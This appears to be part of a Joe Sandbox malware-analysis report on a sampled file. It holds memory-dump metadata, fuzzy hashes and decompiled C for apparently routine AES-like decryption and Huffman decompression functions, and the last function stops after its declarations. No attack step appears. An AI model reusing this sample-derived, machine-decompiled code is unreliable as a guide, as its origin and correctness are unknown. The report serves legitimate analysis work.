0x00000000
0x00e80698
0x00e8066d
0x00e80676
0x00000000
0x00000000
0x00000000
0x00e80676
0x00e8064b
0x00e80654
0x00000000
0x00000000
0x00000000
0x00e80654
0x00e805a9
0x00e805ab
0x00e805c3
0x00e805cb
0x00e805cd
0x00e805e5
0x00e805ed
0x00e805ef
0x00e80607
0x00e8060f
0x00e80611
0x00e8061a
0x00e8061a
0x00000000
0x00e80611
0x00e805f8
0x00e80601
0x00000000
0x00000000
0x00000000
0x00e80601
0x00e805d6
0x00e805df
0x00000000
0x00000000
0x00000000
0x00e805df
0x00e805b4
0x00e805bd
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: f739d8801d235124a97d6ac1d4513cd6af142c19f988364d642aedfdd828a76c
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 4BC1D3322051530AEFAD5639853043FBAA15AE27B530A276ED4FEEB0D5FE20D52CD710

Uniqueness

Uniqueness Score: -1.00%

Function 00E6E57B Relevance: .3, Instructions: 318
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00E6E57B(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				intOrPtr _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				unsigned int _t424;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x6c);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x24)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x6c) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x38)) = __ecx + 8;
						E00E7F750(_t431 + 0x5c, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E00E7F750( *((intOrPtr*)(_t432 + 0x38)), _t432 + 0x58, 0x10);
						}
						_t399 =  *(_t432 + 0x68);
						 *(_t432 + 0x24) = _t399 + 8;
						_t229 =  *((intOrPtr*)(_t432 + 0x78));
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x34)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x28) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x30) = _t359 + _t400 + 0xfffffff8;
							E00E6E549(_t432 + 0x54, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0xea61c0 + (_t402 & 0x000000ff) * 4) ^  *(0xea6dc0 + ( *(_t432 + 0x53) & 0x000000ff) * 4) ^  *(0xea69c0 + ( *(_t432 + 0x56) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x58);
							_t363 =  *(_t432 + 0x10) ^  *(0xea65c0 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t363;
							 *(_t432 + 0x3c) = _t363;
							_t403 =  *(_t432 + 0x50);
							_t368 =  *(0xea65c0 + (_t402 & 0x000000ff) * 4) ^  *(0xea61c0 + (_t403 & 0x000000ff) * 4) ^  *(0xea6dc0 + ( *(_t432 + 0x57) & 0x000000ff) * 4) ^  *(0xea69c0 + ( *(_t432 + 0x5a) & 0x000000ff) * 4);
							 *(_t432 + 0x14) = _t368;
							 *(_t432 + 0x40) = _t368;
							_t404 =  *(_t432 + 0x54);
							 *(_t432 + 0x18) =  *(0xea69c0 + ( *(_t432 + 0x4e) & 0x000000ff) * 4) ^  *(0xea65c0 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x18) ^  *(0xea61c0 + (_t404 & 0x000000ff) * 4) ^  *(0xea6dc0 + ( *(_t432 + 0x5b) & 0x000000ff) * 4);
							 *(_t432 + 0x18) = _t372;
							 *(_t432 + 0x44) = _t372;
							 *(_t432 + 0x1c) =  *(0xea6dc0 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0xea69c0 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x1c) ^  *(0xea65c0 + (_t404 & 0x000000ff) * 4) ^  *(0xea61c0 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x1c) = _t376;
							 *(_t432 + 0x48) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x10);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x1c) = _t309;
							_t430 = _t309;
							 *(_t432 + 0x20) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x10) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x18);
								 *(_t432 + 0x1c) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x14);
								_t416 =  *(0xea65c0 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xea69c0 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xea6dc0 + (_t356 >> 0x18) * 4) ^  *(0xea61c0 + ( *(_t432 + 0x10) & 0x000000ff) * 4);
								 *(_t432 + 0x3c) = _t416;
								 *(_t432 + 0x14) =  *(0xea69c0 + ( *(_t432 + 0x1c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xea6dc0 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x14) ^  *(0xea65c0 + ( *(_t432 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xea61c0 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x14) = _t388;
								 *(_t432 + 0x40) = _t388;
								_t394 =  *(0xea6dc0 + ( *(_t432 + 0x1c) >> 0x18) * 4) ^  *(0xea65c0 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xea69c0 + ( *(_t432 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xea61c0 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x18) = _t394;
								 *(_t432 + 0x44) = _t394;
								_t376 =  *(0xea65c0 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xea69c0 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xea6dc0 + ( *(_t432 + 0x10) >> 0x18) * 4) ^  *(0xea61c0 + ( *(_t432 + 0x1c) & 0x000000ff) * 4);
								_t135 = _t432 + 0x20;
								 *_t135 =  *(_t432 + 0x20) - 1;
								 *(_t432 + 0x48) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t432 + 0x10) = _t416;
							_t415 =  *(_t432 + 0x74);
							 *(_t432 + 0x1c) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x10);
							 *(_t432 + 0x20) = _t253;
							 *(_t432 + 0x4c) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x1c);
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0xea50a0));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x18);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x14);
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0xea50a0));
							_t423 =  *(_t432 + 0x20);
							 *(_t432 + 0x54) = _t406;
							 *(_t432 + 0x50) = _t350;
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0xea50a0));
							 *(_t432 + 0x58) = _t378;
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t350 >> 0x18) + 0xea50a0));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0xea50a0));
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0xea50a0));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0xea50a0));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t406 >> 0x18) + 0xea50a0));
							 *(_t432 + 0x44) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0xea50a0));
							 *((char*)(_t432 + 0x45)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0xea50a0));
							_t424 = _t423 >> 0x18;
							 *((char*)(_t432 + 0x46)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0xea50a0));
							 *((char*)(_t432 + 0x47)) =  *((intOrPtr*)((_t378 >> 0x18) + 0xea50a0));
							 *(_t432 + 0x48) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0xea50a0));
							_t409 =  *(_t432 + 0x3c) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x49)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0xea50a0));
							 *((char*)(_t432 + 0x4a)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0xea50a0));
							_t188 = _t424 + 0xea50a0; // 0x30d56a09
							 *((char*)(_t432 + 0x4b)) =  *_t188;
							_t301 =  *(_t432 + 0x48) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x40) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x44) ^  *(_t429 + 0x20);
							 *(_t432 + 0x20) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x5c);
								_t426 = _t426 ^  *(_t432 + 0x60);
								_t353 = _t353 ^  *(_t432 + 0x64);
								 *(_t432 + 0x20) = _t301 ^  *(_t432 + 0x68);
							}
							 *(_t432 + 0x5c) =  *( *(_t432 + 0x30));
							_t304 =  *(_t432 + 0x24);
							 *(_t432 + 0x60) =  *(_t304 - 4);
							 *(_t432 + 0x64) =  *_t304;
							 *(_t432 + 0x68) = _t304[1];
							_t382 =  *(_t432 + 0x28);
							 *(_t432 + 0x24) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x20);
							_t400 =  *((intOrPtr*)(_t432 + 0x34));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x28) = _t359;
							 *(_t432 + 0x74) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E00E6EA3D( *((intOrPtr*)(_t431 + 0x70)), _t415,  *((intOrPtr*)(_t431 + 0x70)));
				}
				return _t222;
			}

0x00e6e580
0x00e6e584
0x00e6e586
0x00e6e58c
0x00e6e592
0x00e6e599
0x00e6e59d
0x00e6e5b8
0x00e6e5c1
0x00e6e5c6
0x00e6e5cb
0x00e6ea22
0x00000000
0x00e6ea32
0x00e6e5d1
0x00e6e5da
0x00e6e5de
0x00e6e5e2
0x00e6e5e4
0x00e6e5e8
0x00e6e5eb
0x00e6e5ef
0x00e6e5ef
0x00e6e5ff
0x00e6e60c
0x00e6e611
0x00e6e637
0x00e6e63b
0x00e6e646
0x00e6e64d
0x00e6e651
0x00e6e658
0x00e6e67e
0x00e6e68a
0x00e6e68e
0x00e6e69c
0x00e6e6a7
0x00e6e6be
0x00e6e6ca
0x00e6e6ce
0x00e6e6e5
0x00e6e6fa
0x00e6e701
0x00e6e702
0x00e6e706
0x00e6e70d
0x00000000
0x00000000
0x00e6e713
0x00e6e71d
0x00e6e720
0x00e6e724
0x00e6e726
0x00e6e72a
0x00e6e72f
0x00e6e732
0x00e6e736
0x00e6e73c
0x00e6e73e
0x00e6e742
0x00e6e751
0x00e6e781
0x00e6e792
0x00e6e7a4
0x00e6e7c0
0x00e6e7c9
0x00e6e7cd
0x00e6e806
0x00e6e80d
0x00e6e811
0x00e6e83e
0x00e6e845
0x00e6e845
0x00e6e84a
0x00e6e84a
0x00e6e854
0x00e6e858
0x00e6e85c
0x00e6e860
0x00e6e864
0x00e6e867
0x00e6e86b
0x00e6e86f
0x00e6e879
0x00e6e886
0x00e6e892
0x00e6e899
0x00e6e8a3
0x00e6e8af
0x00e6e8b3
0x00e6e8b7
0x00e6e8c1
0x00e6e8ca
0x00e6e8d4
0x00e6e8e1
0x00e6e8f3
0x00e6e905
0x00e6e914
0x00e6e924
0x00e6e939
0x00e6e945
0x00e6e94e
0x00e6e95d
0x00e6e96a
0x00e6e975
0x00e6e97e
0x00e6e98b
0x00e6e98f
0x00e6e995
0x00e6e9a5
0x00e6e9a8
0x00e6e9ab
0x00e6e9b2
0x00e6e9b6
0x00e6e9b8
0x00e6e9bc
0x00e6e9c0
0x00e6e9c8
0x00e6e9c8
0x00e6e9d2
0x00e6e9d6
0x00e6e9dd
0x00e6e9e3
0x00e6e9ed
0x00e6e9f1
0x00e6e9f5
0x00e6e9f9
0x00e6ea00
0x00e6ea03
0x00e6ea07
0x00e6ea0a
0x00e6ea0c
0x00e6ea0f
0x00e6ea12
0x00e6ea16
0x00e6ea16
0x00000000
0x00e6ea21
0x00000000
0x00e6e5a8
0x00e6ea3a

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f3fcc241d8c3d440eabc2cc50beae42b69fd224cbac6f3c18e2c47644a2b62
Instruction ID: b63e5cb805cd3e1709c1d4c92334d170105493c6b527041322756d6b6b46253a
Opcode Fuzzy Hash: 19f3fcc241d8c3d440eabc2cc50beae42b69fd224cbac6f3c18e2c47644a2b62
Instruction Fuzzy Hash: 2AE137755183948FC304CF69D89086ABFF0BB9E300F89495EF5D5A7392C235E909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E73C7D Relevance: .3, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00E73C7D(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E00E6A9D7(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E00E6A9EE(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00E7F5F0(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00E6A9D7(_t184, 2);
						do {
							 *(_t201 + 0x14) = E00E6A9EE(_t184) >> 0x0000000c & 0x000000ff;
							E00E6A9D7(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E00E6A9EE(_t184) >> 0x0000000c & 0x000000ff;
							E00E6A9D7(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E00E732D2();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E00E6A9F3(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E00E6A9EE(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E00E6A9EE(_t157) >> 0xd) + 3;
													_push(3);
												}
												E00E6A9D7(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E00E6A9EE(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00E6A9EE(_t166) >> 0xd) + 3;
												_push(3);
											}
											E00E6A9D7(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E00E749AD(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E00E732D2();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E00E732D2();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E00E732D2();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00E732D2();
							E00E7F750(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E00E72AA7(_t178, _t205);
				}
				_t135 = E00E749AD(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}

0x00e73c7d
0x00e73c84
0x00e73c8d
0x00e73c95
0x00e73ca4
0x00e73caf
0x00e73cb6
0x00e73cbb
0x00e73cc0
0x00e73ce5
0x00e73ce7
0x00e73ced
0x00e73cf3
0x00e73cf9
0x00e73cfe
0x00e73d0d
0x00e73d12
0x00e73d12
0x00e73d19
0x00e73d1f
0x00e73d30
0x00e73d34
0x00e73d39
0x00e73d3d
0x00e73d40
0x00e73d79
0x00000000
0x00e73d79
0x00e73d50
0x00e73d53
0x00e73d58
0x00e73d5a
0x00e73d63
0x00e73d63
0x00e73d66
0x00e73d66
0x00e73d67
0x00e73d6a
0x00000000
0x00000000
0x00e73d6c
0x00e73d71
0x00e73d72
0x00e73d74
0x00000000
0x00000000
0x00000000
0x00e73d74
0x00e73d76
0x00000000
0x00e73d76
0x00e73d5c
0x00e73d7d
0x00e73d7d
0x00e73d7e
0x00e73d7e
0x00e73d83
0x00e73d85
0x00e73d8d
0x00e73d92
0x00e73d93
0x00e73d98
0x00e73d98
0x00e73d9a
0x00e73da3
0x00e73da5
0x00e73db6
0x00e73db8
0x00e73dbf
0x00e73dc5
0x00e73dcb
0x00e73dcf
0x00e73dfc
0x00e73dfd
0x00e73dfe
0x00e73e02
0x00e73e04
0x00e73e22
0x00e73e25
0x00e73e31
0x00e73e33
0x00e73e37
0x00e73e3c
0x00e73e49
0x00e73e4b
0x00e73e4e
0x00e73e50
0x00e73e50
0x00e73e52
0x00e73e5a
0x00e73e5a
0x00e73e5d
0x00e73e74
0x00e73e77
0x00e73ec3
0x00e73ec5
0x00e73ee2
0x00e73ee2
0x00e73ee5
0x00e73ec7
0x00e73ed1
0x00e73ed4
0x00e73ed4
0x00e73ee9
0x00e73eee
0x00e73eee
0x00e73eef
0x00e73ef5
0x00000000
0x00000000
0x00e73ef7
0x00e73efc
0x00e73efd
0x00e73eff
0x00000000
0x00000000
0x00e73f01
0x00e73f01
0x00000000
0x00e73f01
0x00000000
0x00e73eee
0x00e73e79
0x00e73e7c
0x00e73e7e
0x00e73e9b
0x00e73e9b
0x00e73e9e
0x00e73e80
0x00e73e8a
0x00e73e8d
0x00e73e8d
0x00e73ea2
0x00e73ea7
0x00e73ea9
0x00e73f24
0x00e73f24
0x00e73fa3
0x00000000
0x00e73eab
0x00e73eab
0x00e73eab
0x00e73eac
0x00e73eb2
0x00000000
0x00000000
0x00e73eb8
0x00e73ebc
0x00e73ebd
0x00e73ebf
0x00000000
0x00000000
0x00000000
0x00e73ec1
0x00000000
0x00e73eab
0x00e73ea9
0x00e73e6a
0x00e73e6e
0x00000000
0x00e73e6e
0x00e73e0d
0x00e73e0d
0x00e73e0f
0x00e73e0f
0x00e73e11
0x00000000
0x00000000
0x00e73e13
0x00e73e14
0x00e73e17
0x00e73e1a
0x00000000
0x00000000
0x00000000
0x00e73e1c
0x00e73e1e
0x00000000
0x00e73e1e
0x00e73dd3
0x00e73dd6
0x00e73de0
0x00e73de8
0x00e73ded
0x00e73df0
0x00000000
0x00e73df0
0x00e73da9
0x00e73dae
0x00e73db0
0x00000000
0x00000000
0x00000000
0x00e73f07
0x00e73f07
0x00e73f07
0x00e73f13
0x00e73f15
0x00e73f1c
0x00e73f22
0x00e73f28
0x00e73f35
0x00e73f3a
0x00e73f3b
0x00e73f40
0x00e73f4a
0x00e73f52
0x00e73f53
0x00e73f58
0x00e73f62
0x00e73f6a
0x00e73f6b
0x00e73f70
0x00e73f7a
0x00e73f82
0x00e73f83
0x00e73f99
0x00e73fa1
0x00000000
0x00e73fa1
0x00000000
0x00e73f22
0x00e73cc8
0x00e73cd2
0x00e73cd3
0x00000000
0x00e73cda
0x00e73c97
0x00e73c9e
0x00000000
0x00000000
0x00e73fad

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3de862736fa759ab1a4f332156b41f12bf147e2cfccb8d80ac070fbe34d2d0
Instruction ID: c720a6ef8e80a0622b3d77c3929f67ee5350461b2238f5f1b6346636e18dd1ce
Opcode Fuzzy Hash: 2c3de862736fa759ab1a4f332156b41f12bf147e2cfccb8d80ac070fbe34d2d0
Instruction Fuzzy Hash: 229179706047458BDB24EB34E891BFE73D5EF80304F24992DE69BB7282EB749644E742

Uniqueness

Uniqueness Score: -1.00%

Function 00E84C39 Relevance: .2, Instructions: 237
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 83%

			E00E84C39(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
